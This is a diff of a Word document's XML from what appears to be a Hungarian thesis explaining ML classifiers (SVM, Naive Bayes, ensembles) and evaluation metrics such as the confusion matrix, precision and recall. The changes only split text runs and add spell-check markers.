+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11333,8 +12689,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>LinearSVC</w:t>
-      </w:r>
+        <w:t>Vector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -11344,6 +12701,41 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>LinearSVC</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>)</w:t>
       </w:r>
       <w:bookmarkEnd w:id="17"/>
@@ -11374,14 +12766,29 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>z S</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">upport </w:t>
-      </w:r>
+        <w:t xml:space="preserve">z </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>upport</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11392,8 +12799,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">ector </w:t>
-      </w:r>
+        <w:t>ector</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11406,6 +12821,7 @@
         </w:rPr>
         <w:t>achine</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11442,6 +12858,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11460,6 +12877,7 @@
         </w:rPr>
         <w:t>C</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -11482,7 +12900,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(hyperplane) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hyperplane</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12328,6 +13760,7 @@
         </w:rPr>
         <w:t xml:space="preserve">Gaussian </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -12337,9 +13770,34 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Naive Bayes</w:t>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
       </w:r>
       <w:bookmarkEnd w:id="18"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -12361,7 +13819,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>A Naiv Bayes a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
+        <w:t xml:space="preserve">A Naiv </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a felügyelt gépi tanulási osztályozási algoritmusok</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12373,7 +13845,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> csoportja, amely a Bayes-tételen alapul</w:t>
+        <w:t xml:space="preserve"> csoportja, amely a </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-tételen alapul</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12397,7 +13883,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv Bayes-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
+        <w:t xml:space="preserve">Természetesen ezek a függetlenségi feltételezések ritkán igazak, de a gyakorlatban a Naiv </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-modellek meglepően jól teljesítettek, még olyan összetett feladatoknál is, ahol egyértelmű, hogy az erős a függetlenségi feltételezések hamisak.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12845,11 +14345,33 @@
         </w:rPr>
         <w:t xml:space="preserve">s ábra: </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Naive Bayes tétele</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tétele</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -12875,17 +14397,33 @@
         </w:rPr>
         <w:t xml:space="preserve">Háromféle </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Bayes osztályozó létezik</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> osztályozó létezik</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12941,17 +14479,33 @@
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Naive</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Bayes-t használják</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>-t használják</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -12965,17 +14519,33 @@
         </w:rPr>
         <w:t xml:space="preserve">kkor </w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Naive </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Bayes tétel</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Naive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Bayes</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> tétel</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13236,12 +14806,28 @@
         </w:rPr>
         <w:t xml:space="preserve"> (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t>Ensemble Methods</w:t>
-      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Ensemble</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>Methods</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13412,7 +14998,21 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami hiperparaméter néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
+        <w:t xml:space="preserve">z egyes csomópontokban felosztható funkciók száma a teljes érték bizonyos százalékára korlátozódik (ami </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>hiperparaméter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> néven ismert). Ez biztosítja, hogy az együttes modell ne támaszkodjon túlzottan egyetlen egyedi tulajdonságra sem és felhasználja az összes </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13467,6 +15067,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="20" w:name="_Toc71471976"/>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13476,8 +15077,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">Confusion </w:t>
-      </w:r>
+        <w:t>Confusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13487,8 +15089,9 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>M</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -13498,9 +15101,21 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
+        <w:t>M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
         <w:t>atrix</w:t>
       </w:r>
       <w:bookmarkEnd w:id="20"/>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13578,6 +15193,7 @@
         </w:rPr>
         <w:t xml:space="preserve">2.3.1-es ábra: </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13588,8 +15204,16 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">onfusion </w:t>
-      </w:r>
+        <w:t>onfusion</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13606,7 +15230,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">trix </w:t>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13642,6 +15273,7 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13654,12 +15286,14 @@
         </w:rPr>
         <w:t>onfusion</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -13670,7 +15304,14 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t>trix olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
+        <w:t>trix</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> olyan táblázat, amelyet gyakran használnak egy osztályozási modell teljesítményének leírására olyan vizsgálati adatok halmazán, amelyek ismerik a valós értékeket. Ez egy táblázat, amely négy előrejelzett és tényleges érték kombinációját tartalmazza bináris osztályozó esetén</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13735,11 +15376,33 @@
         </w:rPr>
         <w:t>igaz pozitív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">true positive, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13774,11 +15437,33 @@
         </w:rPr>
         <w:t>igaz negatív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">true negative, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13837,11 +15522,33 @@
         </w:rPr>
         <w:t>hamis pozitív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">false positive, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13900,11 +15607,33 @@
         </w:rPr>
         <w:t>hamis negatív (</w:t>
       </w:r>
-      <w:r>
-        <w:rPr>
-          <w:lang w:val="hu-HU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">false negative, </w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>false</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>negative</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -13968,6 +15697,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -13976,6 +15706,7 @@
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -13999,12 +15730,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14021,7 +15754,35 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(true positive) </w:t>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14063,7 +15824,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (total predicted positive)</w:t>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>total</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>predicted</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -14120,12 +15923,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Precision</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14233,6 +16038,7 @@
           <w:lang w:val="hu-HU"/>
         </w:rPr>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:b/>
@@ -14241,6 +16047,7 @@
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -14264,12 +16071,14 @@
         </w:rPr>
         <w:t xml:space="preserve">A </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t>Recall</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14298,14 +16107,42 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> (true positive)</w:t>
-      </w:r>
+        <w:t xml:space="preserve"> (</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>true</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>positive</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:lang w:val="hu-HU"/>
@@ -14340,19 +16177,49 @@
         <w:rPr>
           <w:lang w:val="hu-HU"/>
         </w:rPr>
-        <w:t xml:space="preserve">(total </w:t>
-      </w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="hu-HU"/>
+        </w:rPr>
+        <w:t>total</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
